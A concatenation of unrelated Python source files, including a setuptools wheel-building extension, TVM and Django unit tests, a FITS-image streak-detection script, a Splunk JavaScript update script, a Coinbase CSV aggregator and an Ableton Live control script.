os.path.exists(outfile): os.unlink(outfile) os.symlink(link_dest, outfile, link_dest_isdir) outfiles.append(outfile) return outfiles, updated_files finally: self.scripts.clear() self.scripts.extend(scripts) class Install(install): def get_symlinks(self): """Assembles the symlinks of all the sub-commands.""" symlinks = [] for cmd_name in self.get_sub_commands(): cmd = self.get_finalized_command(cmd_name) try: for filename in cmd.get_symlinks(): if filename not in symlinks: symlinks.append(filename) except AttributeError: pass return symlinks def initialize_options(self): super().initialize_options() def finalize_options(self): super().finalize_options() self._restore_install_lib() def _restore_install_lib(self): """ Undo secondary effect of `extra_path` adding to `install_lib` """ suffix = os.path.relpath(self.install_lib, self.install_libbase) if suffix.strip() == BdistAxle.AXLE_PTH_CONTENTS.strip(): self.install_lib = self.install_libbase def run(self): super().run() @contextlib.contextmanager def suppress_known_deprecation(): with warnings.catch_warnings(): warnings.filterwarnings("ignore", "setup.py install is deprecated") yield class BdistAxle(_bdist_wheel): user_options = list(_bdist_wheel.user_options) user_options += [("root-is-pure=", None, "set to manually override whether the wheel is pure " "(default: None)"), ("abi-tag=", None, "set to override ABI tag " "(default: None)"), ] boolean_options = list(_bdist_wheel.boolean_options) boolean_options += ["root-is-pure"] AXLE_PTH_CONTENTS = """import wheel_axle.runtime; wheel_axle.runtime.finalize(fullname);""" def initialize_options(self): super().initialize_options() self.abi_tag = None self.abi_tag_supplied = False self.python_tag = None self.python_tag_supplied = False self.distribution.extra_path = self.wheel_dist_name, self.AXLE_PTH_CONTENTS self.distribution.install_requires.append(WHEEL_AXLE_DEPENDENCY) def finalize_options(self): root_is_pure_supplied = self.root_is_pure is not None root_is_pure = self.root_is_pure self.abi_tag_supplied = self.abi_tag is not None self.python_tag_supplied = self.python_tag is not None if not self.python_tag_supplied: self.python_tag = python_tag() super().finalize_options() if root_is_pure_supplied: self.root_is_pure = bool(root_is_pure) def get_tag(self): tag = super().get_tag() tag = (self.python_tag if self.python_tag_supplied else tag[0], self.abi_tag if self.abi_tag_supplied else tag[1], tag[2]) supported_tags = [(t.interpreter, t.abi, tag[2]) for t in tags.sys_tags()] assert tag in supported_tags, "would build wheel with unsupported tag {}".format(tag) return tag def run(self): with suppress_known_deprecation(): def remove_patched_command_objs(): for k in patch_classes: if k in self.distribution.command_obj: del self.distribution.command_obj[k] patch_classes = {"install_data": InstallData, "install_lib": InstallLib, "install_headers": InstallHeaders, "install_scripts": InstallScripts, "build_scripts": BuildScripts, "build_py": BuildPy, "egg_info": EggInfo, "install": Install} old_cmdclass = dict(self.distribution.cmdclass) self.distribution.cmdclass.update(patch_classes) remove_patched_command_objs() try: super().run() finally: self.distribution.cmdclass = old_cmdclass remove_patched_command_objs() def egg2dist(self, egginfo_path, distinfo_path): super().egg2dist(egginfo_path, distinfo_path) install_cmd = self.get_finalized_command("install") symlinks = [(os.path.relpath(symlink[0], self.bdist_dir), symlink[1], symlink[2]) for symlink in install_cmd.get_symlinks()] write_symlinks_file(os.path.join(distinfo_path, SYMLINKS_FILE), symlinks) with open(os.path.join(distinfo_path, AXLE_LOCK_FILE), "wb"): pass def write_wheelfile(self, wheelfile_base, generator="bdist_axle (" + __version__ + ")"): return super().write_wheelfile(wheelfile_base, generator) # -*- coding: utf-8 -*- # Copyright (c) 2014 Rackspace, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import ddt from poppy.model.helpers import domain from tests.unit import base @ddt.ddt class TestDomain(base.TestCase): @ddt.unpack @ddt.data({'domain_name': 'www.mydomain.com', 'changed_domain_name': 'www.changed-domain.com'}, {'domain_name': u'www.düsseldorf-Lörick.com'.encode("utf-8"), 'changed_domain_name': u'www.düsseldorf.com'.encode("utf-8") }, {'domain_name': u'WWW.UPPERCASE.COM', 'changed_domain_name': u'WWW.UPPERCASE-CHANGED.COM' }) def test_domain(self, domain_name, changed_domain_name): mydomain = domain.Domain(domain_name) self.assertTrue(mydomain.domain.islower()) # test all properties # domain self.assertEqual(mydomain.domain, domain_name.lower()) self.assertEqual(mydomain.protocol, 'http') self.assertEqual(mydomain.certificate, None) mydomain.domain = changed_domain_name self.assertEqual(mydomain.domain, changed_domain_name.lower()) try: mydomain.certificate = 'SAN' except ValueError: self.assertTrue(True) my_other_domain = domain.Domain.init_from_dict({"domain": domain_name}) self.assertEqual(my_other_domain.domain, domain_name.lower()) try: domain.Domain(domain_name, 'https') except ValueError: self.assertTrue(True) my_https_domain = domain.Domain(domain_name, 'https', 'san') self.assertEqual(my_https_domain.protocol, 'https') self.assertEqual(my_https_domain.certificate, 'san') try: my_https_domain.certificate = 'non-sense' except ValueError: self.assertTrue(True) 0 # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import tvm from tvm import te def test_cast(): analyzer = tvm.arith.Analyzer() x = te.var("x", dtype="int8") m = analyzer.modular_set((x * 3).astype("uint32")) assert m.coeff == 3 assert m.base == 0 m = analyzer.modular_set((x * 3 + 1).astype("float32").astype("int32")) assert m.coeff == 3 assert m.base == 1 def test_add_sub(): analyzer = tvm.arith.Analyzer() x, y = te.var("x", "int64"), te.var("y", "int64") m = analyzer.modular_set(x * 6 + y * 4) assert m.coeff == 2 assert m.base == 0 analyzer.bind(y, x * 4 + 1) m = analyzer.modular_set(1 - y) assert m.coeff == 4 assert m.base == 0 def test_mul(): analyzer = tvm.arith.Analyzer() x, y = te.var("x"), te.var("y") m = analyzer.modular_set((x * 4 + 2) * (y * 6 + 1)) assert m.coeff == 4 assert m.base == 2 def test_floormod(): analyzer = tvm.arith.Analyzer() x, y = te.var("x"), te.var("y") m = analyzer.modular_set(tvm.tir.floormod(x * 128 + y * 4, 256)) assert m.coeff == 4 assert m.base == 0 def test_div_shift(): analyzer = tvm.arith.Analyzer() x, y = te.var("x"), te.var("y") # not sure if x is non-negative tdiv = tvm.tir.truncdiv m = analyzer.modular_set(tdiv(x * 4 + 2, 2)) assert m.coeff == 1 assert m.base == 0 # right shift always round down so it is fine m = analyzer.modular_set((x * 4 + 2) >> 1) assert m.coeff == 2 assert m.base == 1 fld = tvm.te.floordiv m = analyzer.modular_set(fld(x * 4 + 2, 2)) assert m.coeff == 2 assert m.base == 1 # x is non-negative analyzer.update(x, tvm.arith.ConstIntBound(0, 100)) m = analyzer.modular_set(tdiv(x * 4 + 2, 2)) assert m.coeff == 2 assert m.base == 1 def test_min_max_select(): analyzer = tvm.arith.Analyzer() x, y = te.var("x"), te.var("y") m = analyzer.modular_set(tvm.te.min(x * 3, y * 9)) assert m.coeff == 3 assert m.base == 0 m = analyzer.modular_set(tvm.te.max(x * 3 + 1, y * 9 + 4)) assert m.coeff == 3 assert m.base == 1 m = analyzer.modular_set(tvm.tir.Select(x > 0, x * 3 + 1, y * 9 + 2)) assert m.coeff == 1 assert m.base == 0 def test_mix_index(): a = te.var("a") b = te.var("b") analyzer = tvm.arith.Analyzer() tdiv = tvm.tir.truncdiv m = analyzer.modular_set(a * 4 + b * 6 + 7) assert m.coeff == 2 assert m.base == 1 m = analyzer.modular_set((a * 4 + 1) * (b * 8 + 3)) assert m.coeff == 4 assert m.base == 3 m = analyzer.modular_set(tdiv(a * 4 + 1, b * 8 + 3)) assert m.coeff == 1 assert m.base == 0 m = analyzer.modular_set((a * 4 + 1) * tdiv(b * 8, 4)) assert m.coeff == 2 assert m.base == 0 m = analyzer.modular_set((a * 12 + 1) - (b * 3 * 7 + 2)) assert m.coeff == 3 assert m.base == 2 m = analyzer.modular_set(a * 12 + tvm.te.min(b * 3 * 7, 2)) assert m.coeff == 1 assert m.base == 0 def test_constraint_scope(): a = te.var("a") b = te.var("b") analyzer = tvm.arith.Analyzer() tmod = tvm.tir.truncmod with analyzer.constraint_scope(tmod(b, 4) == 2): m = analyzer.modular_set(b + 1) assert m.coeff == 4 assert m.base == 3 with analyzer.constraint_scope(tmod(a, 2) == 1): m = analyzer.modular_set(b + a * 2) assert m.coeff == 4 assert m.base == 0 m = analyzer.modular_set(b + a * 2) assert m.coeff == 2 assert m.base == 0 m = analyzer.modular_set(b + 1) assert m.coeff == 1 assert m.base == 0 def test_intersect(): a = te.var("a") analyzer = tvm.arith.Analyzer() tmod = tvm.tir.truncmod with analyzer.constraint_scope(tmod(a, 4) == 1): with analyzer.constraint_scope(tmod(a, 3) == 1): m = analyzer.modular_set(a) assert m.coeff == 12 assert m.base == 1 with analyzer.constraint_scope(tmod(a, 3) == 2): with analyzer.constraint_scope(tmod(a, 5) == 3): with analyzer.constraint_scope(tmod(a, 7) == 2): m = analyzer.modular_set(a) assert m.coeff == 105 assert m.base == 23 def test_let(): analyzer = tvm.arith.Analyzer() x = te.var("x") y = te.var("y") m = analyzer.modular_set(tvm.tir.Let(x, y * 10, x + 1)) m.coeff = 10 m.base = 1 if __name__ == "__main__": test_let() test_cast() test_add_sub() test_mul() test_div_shift() test_floormod() test_min_max_select() test_mix_index() test_constraint_scope() test_intersect() #! /usr/bin/env python # # 1440 files took about 38 mins # from __future__ import print_function from tkinter import filedialog from tkinter import * from astride import Streak import glob import sys import shutil import os import tkinter as tk import matplotlib.pyplot as plt from astropy.io import fits import numpy as np class _Args: file_pathin = "" file_pathout = "" shape = 0.14 area = 120 contour = 12 diff = False v = False start_frame = -1 end_frame = -1 def get_arg(argv): arguments = _Args() if len(argv) == 1: return get_int_arg(arguments) else: return get_cmd_arg(argv, arguments) def mk_diff(f0,f1,diff, v): hdu0 = fits.open(f0, ignore_missing_end=True) hdu1 = fits.open(f1, ignore_missing_end=True) h1 = hdu1[0].header d0 = hdu0[0].data d1 = hdu1[0].data if v: print("DEBUG mean/std: %s %s %s %g %g" % (f0,f1,diff,d0.mean(),d0.std())) d2 = d1-d0 fits.writeto(diff,d2,h1,overwrite=True) def get_cmd_arg(argv, arguments): import argparse as ap parser = ap.ArgumentParser() parser.add_argument('-i','--filein', nargs=1,help = 'Directory to input fits directory') parser.add_argument('-o','--fileout', nargs=1,help = 'Directory to output folder') parser.add_argument('-s','--shape', nargs=1,help = 'Shape factor') parser.add_argument('-a','--area', nargs=1,help = 'Minimum area to be considered a streak') parser.add_argument('-c','--contour',nargs=1,help = 'Control value') parser.add_argument('-d','--difference',action = 'store_const',const = arguments.diff , help = 'Create difference images') parser.add_argument('-v','--verbose', action = 'store_const', const = arguments.v, help = 'Verbose') parser.add_argument('-S','--start',nargs = 1, help = 'Start Frame (starts at 1)') parser.add_argument('-E','--end', nargs = 1, help = 'End Frame') args=vars(parser.parse_args()) if args['filein'] != None: arguments.file_pathin = (args['filein'][0]) if args['fileout'] != None: arguments.file_pathout = (args['fileout'][0]) else: if arguments.file_pathin.endswith("/"): arguments.file_pathout = arguments.file_pathin[0:len(arguments.file_pathin) -1] + "-output" else: arguments.file_pathout = arguments.file_pathin +"-output" if args['shape'] != None: arguments.shape = float(args['shape'][0]) if args['area'] != None: arguments.area = float(args['area'][0]) if args['contour'] != None: arguments.contour = float(args['contour'][0]) if args['difference'] != None: arguments.diff = True if args['verbose'] != None: arguments.v = True if args['start'] != None: arguments.start_frame = int(args['start'][0]) if args['end'] != None: arguments.end_frame = int(args['end'][0]) return arguments def get_int_arg(arguments): #Creates folder input browsers winin = tk.Tk() winin.withdraw() winin.attributes('-topmost', True) arguments.file_pathin = filedialog.askdirectory(title = "Select input") #Creates folder output browsers winout = tk.Tk() winout.withdraw() winout.attributes('-topmost', True) arguments.file_pathout = filedialog.askdirectory(title = "Select output") winout.destroy() winin.destroy() top = tk.Tk() nshape = tk.StringVar() narea = tk.StringVar() ncontour = tk.StringVar() nstart_frame = tk.StringVar() nend_frame = tk.StringVar() ndiff = tk.IntVar() nv = tk.IntVar() L1 = Label(top, text="Shape value (1=circle, .1=thin oval) (default = 0.14): ") L1.pack() eshape = Entry(top, textvariable=nshape) #nshape = float(nshape.get()) eshape.pack() L2 = Label(top, text="Minimum area (default = 120): ") L2.pack() earea = Entry(top, textvariable=narea) #narea = float(narea.get()) earea.pack() L3 = Label(top, text="Contour value (higher=only brighter streaks detected)(default = 12): ") L3.pack() econtour = Entry(top, textvariable=ncontour) #ncontour = float(ncontour.get()) econtour.pack() L4 = Label(top, text="Frame at which to start (default = 1)") L4.pack() estart_frame = Entry(top, textvariable=nstart_frame) #nstart_frame = float(nstart_frame.get()) estart_frame.pack() L5 = Label(top, text="Last frame (does not process last frame) (default goes to end)") L5.pack() eend_frame = Entry(top, textvariable=nend_frame) #nend_frame = float(nend_frame.get()) eend_frame.pack() C1 = Checkbutton(top, text = "Difference imaging (default = false)", variable = ndiff, \ onvalue=1, offvalue=0 ) C2 = Checkbutton(top, text = "Verbose mode (default = false)", variable = nv, \ onvalue = 1, offvalue = 0 ) def save(nshape, narea, ncontour, nstart_frame, nend_frame, ndiff, nv): if len(nshape.get()) != 0: arguments.shape = float(nshape.get()) if len(narea.get()) != 0: arguments.area = float(narea.get()) if len(ncontour.get()) != 0: arguments.contour = float(ncontour.get()) if len(nstart_frame.get()) != 0: arguments.start_frame = int(nstart_frame.get()) if len(nend_frame.get()) != 0: arguments.end_frame = int(nend_frame.get()) arguments.diff = ndiff.get() arguments.v = nv.get() top.destroy() s = Button(top, text="Save Values", command=lambda: save(nshape, narea, ncontour, nstart_frame, nend_frame, ndiff, nv)) C1.pack() C2.pack() s.pack() top.mainloop() return(arguments) def do_dir(arguments): """ process a directory 'd' """ #print("Outputting in directory: " + dsum) if not os.path.exists(arguments.file_pathout): os.mkdir(arguments.file_pathout) num = 0 detected = 0 fileCount = 0 zero_image = 0 bad_image = 0 bad_image_paths = [] # debug/verbose if arguments.v: print('DEBUG: shape=%g area=%g contour=%g' % (arguments.shape,arguments.area,arguments.contour)) ffs = glob.glob(arguments.file_pathin+'/*.FIT') + glob.glob(arguments.file_pathin+'/*.fit') + \ glob.glob(arguments.file_pathin+'/*.FTS') + glob.glob(arguments.file_pathin+'/*.fts') + \ glob.glob(arguments.file_pathin+'/*.FITS') + glob.glob(arguments.file_pathin+'/*.fits') ffs = list(set(ffs)) # needed for dos ffs.sort() # on linux wasn't sorted, on dos it was f = open(arguments.file_pathout+'/summary.txt','w') # Creates summary text file f.write('Streaks found in files: \n') #Creates first line for summary file sf = arguments.start_frame ef = arguments.end_frame if sf <= 0: sf = 1 if ef <= 0 or ef > len(ffs): ef = len(ffs) if ef < sf: temp = sf sf = ef ef = temp print('Processing %d files from %d to %d' % ((ef-sf+1), sf, ef)) for ff in ffs[sf-1:ef]: # creates directory one directory back from the folder which contains fits files num = do_one(ff,arguments.file_pathout+'/'+ff[ff.rfind(os.sep)+1:ff.rfind('.')],arguments.shape,arguments.area,arguments.contour) if num == 0: zero_image += 1 elif num < 0: bad_image += 1 bad_image_paths.append(ff) else: detected += int(num) #Counter of how many streaks detected f.write(ff + '\n') fileCount += 1 #Counter for how many files analyzed print("\n") # Produce and write summary file f.write('\n' 'Files analyzed: ' + str(fileCount)+ '\n' ) f.write('Streaks detected: ' + str(detected) + '\n' ) f.write('Files with no detections: ' + str(zero_image) + '\n') f.write('Bad files: ' + str(bad_image)+ '\n') temp_string = "\n" temp_string = temp_string.join(bad_image_paths) f.write(temp_string) f.write('\n\n') if arguments.diff: f.write('Streaks found in Files: \n') num = 0 detected = 0 fileCount = 0 zero_image = 0 bad_image = 0 bad_image_paths = [] dfs = [] # print('Computing %d differences' % (ef-sf+1)) for i in range(len(ffs)-1): dfs.append(arguments.file_pathout+'/'+ffs[i+1][len(arguments.file_pathin):]+'DIFF') # mk_diff(ffs[i],ffs[i+1],dfs[i],v) if sf <= 0: sf = 1 if ef <= 0 or ef > len(dfs): ef = len(dfs) if ef <= sf: temp = sf sf = ef ef = temp print('Processing %d files from %d to %d' % ((ef-sf+1), sf, ef)) i = sf-1 for df in dfs[sf-1:ef]: try: mk_diff(ffs[i],ffs[i+1],dfs[i],arguments.v) # num = do_one(df,dsum+'/'+df[df.rfind(os.sep)+1:df.rfind('.')],shape,area,contour) #diff_file = dsum+'/'+df[df.rfind(os.sep)+1:df.find('.')]+'DIFF' #directory one directory back new_dir = arguments.file_pathout+'/'+df[df.rfind(os.sep)+1:df.rfind('.')]+'DIFF' num = do_one(df,new_dir,arguments.shape,arguments.area,arguments.contour) os.remove(df) except: num=-1 sys.stdout.write('X') if num == 0: zero_image += 1 elif num < 0: bad_image += 1 bad_image_paths.append(df) else: detected += int(num) #Counter of how many streaks detected f.write(df + '\n') fileCount += 1 #Counter for how many files analyzed i += 1 print("\n") # Produce and write summary file f.write('\n' 'Files analyzed: ' + str(fileCount)+ '\n' ) f.write('Streaks detected: ' + str(detected) + '\n' ) f.write('Files with no detections: ' + str(zero_image) + '\n') f.write('Bad files: ' + str(bad_image)+ '\n') temp_string = "\n" temp_string = temp_string.join(bad_image_paths) f.write(temp_string) f.close() else: f.close() def do_one(ff,output_path,shape,area,contour): """ process a directory one fits-file (ff) """ try: # Read a fits image and create a Streak instance. streak = Streak(ff,output_path=output_path) # Detect streaks. # streak.shape_cut = .14 # streak.area_cut = 120 # streak.contour_threshold = 12 # Customization of values streak.shape_cut = shape streak.area_cut = area streak.contour_threshold = contour streak.detect() n = len(streak.streaks) except: n = -1 if n > 0: # Write outputs and plot figures. streak.write_outputs() streak.plot_figures() if n == 0: sys.stdout.write('.') elif n < 0: sys.stdout.write('X') elif n < 10: sys.stdout.write('%d' % n) else: sys.stdout.write('*') sys.stdout.flush() return n #def do_one(ff,output_path=None,shape=None,area=None,contour=None): BACKUP """ process a directory one fits-file (ff) """ # Read a fits image and create a Streak instance. streak = Streak(ff,output_path=output_path) # Detect streaks. # streak.shape_cut = .14 # streak.area_cut = 120 # streak.contour_threshold = 12 #Customization of values streak.shape_cut = shape streak.area_cut = area streak.contour_threshold = contour streak.detect() n = len(streak.streaks) # Write outputs and plot figures. streak.write_outputs() streak.plot_figures() streakfile=output_path+"/streaks.txt" fp=open(streakfile) lines=fp.readlines() fp.close() #print("streaks found %d" % (len(lines)-1)) #print("%d " % (len(lines)-1)) n = len(lines)-1 if n == 0: sys.stdout.write('.') elif n < 10: sys.stdout.write('%d' % n) else: sys.stdout.write('*') sys.stdout.flush() #Delete/move files if n == 0: shutil.rmtree(output_path) return int(n) #do_one('20151108_MD01_raw/IMG00681.FIT') #do_dir('20151108_MD01_raw') if __name__ == '__main__': try: arguments = get_arg(sys.argv) except: print("An error occored getting the arguments for the function\n") sys.exit(0) #Prints selected folders print("Running in data directory %s" % arguments.file_pathin) print("Outputting in data directory %s" % arguments.file_pathout) do_dir(arguments) #print("Running in data directory %s" % sys.argv[1]) #do_dir(sys.argv[1],sys.argv[2]) # SPDX-FileCopyrightText: 2020 2020 # # SPDX-License-Identifier: Apache-2.0 import os import sys import urllib2 # Only run this script if the search_mrsparkle directory exists here if not os.path.isdir("search_mrsparkle"): print "Couldn't find the search_mrsparkle dir, assuming this is the wrong folder." sys.exit() # URLs for splunk/splunk-sdk-javascript on GitHub github_raw_url = "https://raw.githubusercontent.com/splunk/splunk-sdk-javascript" github_branch_name = "master" splunk_js_url = "/".join([github_raw_url, github_branch_name, "client/splunk.js"]) splunk_js_min_url = "/".join([github_raw_url, github_branch_name, "client/splunk.min.js"]) base_js_path = os.path.sep.join([os.path.abspath(os.path.dirname(__file__)), "search_mrsparkle", "exposed", "js"]) # File paths to update js_contrib_path = os.path.sep.join([base_js_path, "contrib"]) js_splunkjs_path = os.path.sep.join([base_js_path, "splunkjs"]) try : # Update splunk.js print "Trying to download splunk.js from GitHub" splunk_js = urllib2.urlopen(splunk_js_url).read() print "\t success!" print "Trying to update splunk.js in %s" % js_contrib_path splunk_js_file = open(os.path.sep.join([js_contrib_path, "splunk.js"]), "w") splunk_js_file.write(splunk_js) splunk_js_file.close() print "\t success!" print "Trying to update splunk.js in %s" % js_splunkjs_path splunk_js_file = open(os.path.sep.join([js_splunkjs_path, "splunk.js"]), "w") splunk_js_file.write(splunk_js) splunk_js_file.close() print "\t success!" # Update splunk.min.js print "Trying to download splunk.min.js from GitHub" splunk_js = urllib2.urlopen(splunk_js_min_url).read() print "\t success!" print "Trying to update splunk.min.js in %s" % js_contrib_path splunk_js_file = open(os.path.sep.join([js_contrib_path, "splunk.min.js"]), "w") splunk_js_file.write(splunk_js) splunk_js_file.close() print "\t success!" print "Trying to update splunk.min.js in %s" % js_splunkjs_path splunk_js_file = open(os.path.sep.join([js_splunkjs_path, "splunk.min.js"]), "w") splunk_js_file.write(splunk_js) splunk_js_file.close() print "\t success!" # If not exceptions, everything is complete print "Everything completed successfully!" except urllib2.URLError as ul2e: print "Error trying to download splunk-sdk-javascript files from GitHub: \n\t %s" % ul2e except IOError as ioe: print "Error trying to write splunk.js and/or splunk.min.js : \n\t %s" % ioe except Error as e: print "Unexpected error %s" % e1-10 from setuptools import setup, find_packages setup( author='', author_email='', description='Tox wrapped in docker', name='boxer', version='0.1', packages=find_packages('boxer', exclude=['tests']), include_package_data=True, url='https://github.com/bradleygolden/boxer', keywords=['tox', 'pyenv', 'docker'], setup_requires=['pytest-runner'], tests_require=['pytest'], install_requires=[ 'Click', 'docker' ], entry_points=''' [console_scripts] boxer=boxer.boxer:cli ''', ) # Generated by Django 3.1.4 on 2021-02-04 05:45 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('blog', '0016_setting'), ] operations = [ migrations.RemoveField( model_name='category', name='parent', ), migrations.RemoveField( model_name='images', name='product', ), migrations.RemoveField( model_name='product', name='category', ), migrations.DeleteModel( name='Setting', ), migrations.DeleteModel( name='Category', ), migrations.DeleteModel( name='Images', ), migrations.DeleteModel( name='Product', ), ] import csv, datetime record = {} with open('coinbaseUSD.csv', 'r') as csvfile: reader = csv.reader(csvfile) daily_info = {} current_day = 0 volume = 0 usd_spent = 0 open_ = close = None high = low = None for row in reader: if current_day == datetime.datetime.fromtimestamp(int(row[0])).date(): volume = volume + float(row[2]) usd_spent = usd_spent + float(row[2]) * float(row[1]) close = float(row[1]) if open is None: open_ = close if high is None or high < close: high = close if low is None or low > close: low = close else: if volume != 0: record[current_day] = [usd_spent / volume, volume, open, close, high, low] volume = 0 usd_spent = 0 open_ = high = low = None #print(str(current_day) + ': ' + str(usd_spent) + ' ' + str(volume)) else: record[current_day] = 0 current_day = datetime.datetime.fromtimestamp(int(row[0])).date() print(current_day) with open('output.csv', 'w') as csvfile: writer = csv.writer(csvfile) for date, data in record.items(): #print([date]) #print(data) if data != 0: writer.writerow([date] + data) src/PinguinoClassifierTest.py # -*- coding: utf-8 -*- #!/usr/bin/env python3 """ ============================================= Autor: - - - - - Fecha: 13/10/2019 ============================================= Contiene la definición de la clase PinguinoClassifierTest encargada del las pruebas de la clase PinguinoClassifier. ============================================= """ import unittest from PinguinoClassifier import PinguinoClassifier # Imagen de pinguino PINGUINO_FILE = './unit_test_data/pinguino.jpg' # Imagen de no pinguino NOT_PINGUINO_FILE = './unit_test_data/not_pinguino.jpg' class PinguinoClassifierTest(unittest.TestCase): # Prueba el caso de que se pase la imagen de un pinguino def test_predict_true(self): classifier = PinguinoClassifier() self.assertTrue(classifier.predict(PINGUINO_FILE)) # Prueba el caso de que se pase la imagen de algo que no sea # un pinguino def test_predict_false(self): classifier = PinguinoClassifier() self.assertFalse(classifier.predict(NOT_PINGUINO_FILE)) if __name__ == "__main__": unittest.main()1-10 from unittest import mock import pytest from rest_framework import status class BaseDatasetViewTest: """Base test class for dataset view tests. When subclassed by a view test class adds authentication and authorization tests common for all views. """ view_url = None factory = None @pytest.mark.parametrize('method', ('delete', 'patch', 'post', 'put')) def test_other_methods_not_allowed( self, data_flow_api_client, method, ): """Test that various HTTP methods are not allowed.""" response = data_flow_api_client.request(method, self.view_url) assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED def test_without_scope(self, hawk_api_client): """Test that making a request without the correct Hawk scope returns an error.""" hawk_api_client.set_credentials( 'test-id-without-scope', 'test-key-without-scope', ) response = hawk_api_client.get(self.view_url) assert response.status_code == status.HTTP_403_FORBIDDEN def test_without_credentials(self, api_client): """Test that making a request without credentials returns an error.""" response = api_client.get(self.view_url) assert response.status_code == status.HTTP_401_UNAUTHORIZED def test_without_whitelisted_ip(self, data_flow_api_client): """Test that making a request without the whitelisted IP returns an error.""" data_flow_api_client.set_http_x_forwarded_for('1.1.1.1') response = data_flow_api_client.get(self.view_url) assert response.status_code == status.HTTP_401_UNAUTHORIZED def test_no_data(self, data_flow_api_client): """Test that without any data available, endpoint completes the request successfully""" response = data_flow_api_client.get(self.view_url) assert response.status_code == status.HTTP_200_OK @mock.patch('datahub.dataset.core.pagination.DatasetCursorPagination.page_size', 2) def test_pagination(self, data_flow_api_client): """Test that when page size higher than threshold response returns with next page url""" self.factory.create_batch(2 + 1) response = data_flow_api_client.get(self.view_url) assert response.status_code == status.HTTP_200_OK assert response.json()['next'] is not None def test_pagination_can_be_controlled_by_client(self, data_flow_api_client): """Test that pagination can be controlled by the client""" self.factory.create_batch(2) response_for_page_size_1 = data_flow_api_client.get(self.view_url, params={'page_size': 1}) response_for_page_size_2 = data_flow_api_client.get(self.view_url, params={'page_size': 2}) assert response_for_page_size_1.status_code == status.HTTP_200_OK assert response_for_page_size_2.status_code == status.HTTP_200_OK assert len(response_for_page_size_1.json()['results']) == 1 assert len(response_for_page_size_2.json()['results']) == 2 @mock.patch('datahub.dataset.core.pagination.DatasetCursorPagination.max_page_size', 2) def test_pagination_respects_max_page_size(self, data_flow_api_client): """Test that pagination conrolled by the client cannot bypass our own max page size""" self.factory.create_batch(2) response_for_page_size_1 = data_flow_api_client.get(self.view_url, params={'page_size': 1}) response_for_page_size_10 = data_flow_api_client.get( self.view_url, params={'page_size': 10}, ) assert response_for_page_size_1.status_code == status.HTTP_200_OK assert response_for_page_size_10.status_code == status.HTTP_200_OK assert len(response_for_page_size_1.json()['results']) == 1 assert len(response_for_page_size_10.json()['results']) == 2 NSUSpray/LinkedClips # -*- coding: utf-8 -*- from __future__ import with_statement import Live from _Framework.ControlSurface import ControlSurface class LinkedClips (ControlSurface): u""" Rumotescripts LinkedClips """ def __init__ (self, c_instance): ControlSurface.__init__ (self, c_instance) with self.component_guard (): self.arrangement_clips = set () self.clip = self.song().view.detail_clip if self.clip: self.clip.add_name_listener (self._on_clip_name_changed) if self.clip.name: self.add_named_clip_listeners () if self.clip.is_arrangement_clip: self._copy_data_from_existing_clip () self.arrangement_clips.add (self.clip) self.song().view.add_detail_clip_listener (self._on_detail_clip_changed) def _on_detail_clip_changed (self): self.schedule_message (1, self._change_clip_listeners) def _change_clip_listeners (self): if self.clip and hasattr (self.clip, 'name'): # left the clip, clip exists (not deleting) self.clip.remove_name_listener (self._on_clip_name_changed) if self.clip.name: self.remove_named_clip_listeners () self._change_another_clips_nonlisteners () ############################ self.clip = self.song().view.detail_clip ############################ if self.clip: self.clip.add_name_listener (self._on_clip_name_changed) if self.clip.name: self.add_named_clip_listeners () if self.clip.is_arrangement_clip: self._copy_data_from_existing_clip () self.arrangement_clips.add (self.clip) def add_named_clip_listeners (self): self._change_named_clip_listeners ('add') def remove_named_clip_listeners (self): self._change_named_clip_listeners ('remove') def _change_named_clip_listeners (self, action): if self.clip.color_has_listener (self._on_clip_color_changed) == (action == 'remove'): # are there any listeners getattr (self.clip, action + '_looping_listener') (self._on_clip_looping_changed) getattr (self.clip, action + '_loop_start_listener') (self._on_clip_loop_start_changed) getattr (self.clip, action + '_loop_end_listener') (self._on_clip_loop_end_changed) getattr (self.clip, action + '_color_listener') (self._on_clip_color_changed) getattr (self.clip, action + '_signature_numerator_listener') (self._on_clip_signature_numerator_changed) getattr (self.clip, action + '_signature_denominator_listener') (self._on_clip_signature_denominator_changed) if self.clip.is_midi_clip: getattr (self.clip, action + '_notes_listener') (self._on_clip_notes_changed) else: # if self.clip.is_audio_clip getattr (self.clip, action + '_gain_listener') (self._on_clip_gain_changed) getattr (self.clip, action + '_pitch_coarse_listener') (self._on_clip_pitch_coarse_changed) getattr (self.clip, action + '_pitch_fine_listener') (self._on_clip_pitch_fine_changed) getattr (self.clip, action + '_warping_listener') (self._on_clip_warping_changed) getattr (self.clip, action + '_warp_mode_listener') (self._on_clip_warp_mode_changed) def _on_clip_name_changed (self): self.schedule_message (1, self._clip_name_changed_actions) # since it is not possible to change the clip inside the listener def _clip_name_changed_actions (self): with Undo (): self._change_another_clips_nonlisteners () if self.clip.name: self.add_named_clip_listeners () if self.clip.is_arrangement_clip: self.arrangement_clips.add (self.clip) self._copy_data_from_existing_clip () else: self.remove_named_clip_listeners () if self.clip.is_arrangement_clip: self.arrangement_clips.remove (self.clip) def _copy_data_from_existing_clip (self): try: clip = self.another_clips().next () except StopIteration: return #################################### looping = clip.looping if clip.is_audio_clip: warping = clip.warping # necessary, because when you turn on the loop the warping is automatically turned on self.clip.looping = clip.looping = True #self.clip.start_marker = clip.start_marker #self.clip.end_marker = clip.end_marker self.clip.loop_start = clip.loop_start self.clip.loop_end = clip.loop_end if not looping: self.clip.looping = clip.looping = False if clip.is_audio_clip: self.clip.warping = clip.warping = warping ############################## self.clip.color = clip.color self.clip.signature_numerator = clip.signature_numerator 